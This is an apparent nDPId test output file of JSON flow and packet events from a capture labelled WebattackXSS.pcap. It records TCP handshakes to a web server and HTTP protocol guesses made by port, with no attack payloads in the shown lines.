+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1909,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":1499347196341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347196341,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8LeJAAD4Gl+6sEAABwKgKMtVcAFCW1uraAAAAAKACchA\/NAAAAgQFtAQCCAoBOcc4AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1910,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":2,"flow_last_seen":1499347196341,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347196341,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1Vx\/2Nugltbq26AScSBICAAAAgQFtAQCCAoD45iuATnHOAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1911,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":3,"flow_last_seen":1499347196342,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347196342,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0LeNAAD4Gl\/WsEAABwKgKMtVcAFCW1urbf9jboYAQAOXnDwAAAQEICgE5xzgD45iu"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1922,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347197627,"flow_last_seen":1499347197627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347197627,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54634,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1922,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1499347197627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347197627,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8jKtAAD4GOSWsEAABwKgKMtVqAFDoUUTRAAAAAKACchCScgAAAgQFtAQCCAoBOch6AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1923,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1499347197628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347197628,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1WoUz7Ep6FFE0qAScSAvhQAAAgQFtAQCCAoD45nwATnIegEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1924,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":3,"flow_last_seen":1499347197628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347197628,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0jKxAAD4GOSysEAABwKgKMtVqAFDoUUTSFM+xKoAQAOXOjAAAAQEICgE5yHoD45nw"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1939,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347200170,"flow_last_seen":1499347200170,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347200170,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54660,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1939,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1499347200170,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347200170,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8egdAAD4GS8msEAABwKgKMtWEAFAb8rDyAAAAAKACchDwGwAAAgQFtAQCCAoBOcr1AAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":1499347200171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347200171,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1YQCBmJ3G\/Kw86AScSDsLQAAAgQFtAQCCAoD45xsATnK9QEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":3,"flow_last_seen":1499347200171,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347200171,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eghAAD4GS9CsEAABwKgKMtWEAFAb8rDzAgZieIAQAOWLNAAAAQEICgE5yvYD45xs"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1951,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347201471,"flow_last_seen":1499347201471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201471,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54674,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1951,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":1499347201471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347201471,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JERAAD4GoYysEAABwKgKMtWSAFCOe+h\/AAAAAKACchBEsQAAAgQFtAQCCAoBOcw7AAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1952,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":2,"flow_last_seen":1499347201471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347201471,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1ZJxUzmIjnvogKAScSD5HwAAAgQFtAQCCAoD452xATnMOwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":3,"flow_last_seen":1499347201472,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347201472,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JEVAAD4GoZOsEAABwKgKMtWSAFCOe+iAcVM5iYAQAOWYJwAAAQEICgE5zDsD452x"} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347069146,"flow_last_seen":1499347074630,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347069146,"flow_last_seen":1499347074630,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53286,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347070422,"flow_last_seen":1499347075631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347070422,"flow_last_seen":1499347075631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347071685,"flow_last_seen":1499347077632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347071685,"flow_last_seen":1499347077632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347074268,"flow_last_seen":1499347079633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347074268,"flow_last_seen":1499347079633,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53340,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00656{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347075596,"flow_last_seen":1499347080634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00581{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1961,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347075596,"flow_last_seen":1499347080634,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347201670,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347202722,"flow_last_seen":1499347202722,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347202722,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54688,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1967,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":1,"flow_last_seen":1499347202722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347202722,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83mxAAD4G52OsEAABwKgKMtWgAFD5fxMfAAAAAKACchCtxwAAAgQFtAQCCAoBOc1zAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1968,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":2,"flow_last_seen":1499347202722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347202722,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1aA8zHVU+X8TIKAScSBZuAAAAgQFtAQCCAoD457qATnNcwEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1969,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":138,"flow_packet_id":3,"flow_last_seen":1499347202722,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347202722,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03m1AAD4G52qsEAABwKgKMtWgAFD5fxMgPMx1VYAQAOX4vwAAAQEICgE5zXMD457q"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1982,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347205214,"flow_last_seen":1499347205214,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347205214,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54714,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1982,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":1,"flow_last_seen":1499347205214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347205214,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8ZeBAAD4GX\/CsEAABwKgKMtW6AFAegaoCAAAAAKACchDvWQAAAgQFtAQCCAoBOc\/iAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1983,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":2,"flow_last_seen":1499347205214,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347205214,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1bp74sNGHoGqA6AScSAL0wAAAgQFtAQCCAoD46FZATnP4gEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1985,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":139,"flow_packet_id":3,"flow_last_seen":1499347205215,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347205215,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0ZeFAAD4GX\/esEAABwKgKMtW6AFAegaoDe+LDR4AQAOWq2QAAAQEICgE5z+MD46FZ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1994,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347206497,"flow_last_seen":1499347206497,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347206497,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1994,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":1,"flow_last_seen":1499347206497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347206497,"pkt":"ABm5CmnxAMGxFOsxCABFAAA85d9AAD4G3\/CsEAABwKgKMtXIAFBJFTT8AAAAAKACchA4fQAAAgQFtAQCCAoBOdEjAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":2,"flow_last_seen":1499347206497,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347206497,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1cindk\/NSRU0\/aAScSCbmwAAAgQFtAQCCAoD46KZATnRIwEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":140,"flow_packet_id":3,"flow_last_seen":1499347206498,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347206498,"pkt":"ABm5CmnxAMGxFOsxCABFAAA05eBAAD4G3\/esEAABwKgKMtXIAFBJFTT9p3ZPzoAQAOU6owAAAQEICgE50SMD46KZ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347207764,"flow_last_seen":1499347207764,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347207764,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2006,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":1,"flow_last_seen":1499347207764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347207764,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8oEFAAD4GJY+sEAABwKgKMtXWAFBZgnIhAAAAAKACchDpnwAAAgQFtAQCCAoBOdJgAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2007,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":2,"flow_last_seen":1499347207764,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347207764,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1dboCFwKWYJyIqAScSD+sQAAAgQFtAQCCAoD46PWATnSYAEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2008,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":141,"flow_packet_id":3,"flow_last_seen":1499347207765,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347207765,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0oEJAAD4GJZasEAABwKgKMtXWAFBZgnIi6AhcC4AQAOWduQAAAQEICgE50mAD46PW"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347210270,"flow_last_seen":1499347210270,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347210270,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2024,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":1,"flow_last_seen":1499347210270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347210270,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8H3tAAD4GplWsEAABwKgKMtXwAFCR7supAAAAAKACchBVHwAAAgQFtAQCCAoBOdTSAAAAAAEDAwc="} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2025,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":1499347210270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347210270,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ1fCjgnLike7LqqAScSCVbAAAAgQFtAQCCAoD46ZJATnU0gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2026,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":3,"flow_last_seen":1499347210270,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347210270,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0H3xAAD4GplysEAABwKgKMtXwAFCR7suqo4Jy44AQAOU0dAAAAQEICgE51NID46ZJ"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2037,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347211522,"flow_last_seen":1499347211522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347211522,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2037,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":143,"flow_packet_id":1,"flow_last_seen":1499347211522,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347211522,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86VZAAD4G3HmsEAABwKgKMtX+AFCmKj9dAAAAAKACchDL6AAAAgQFtAQCCAoBOdYLAAAAAAEDAwc="} 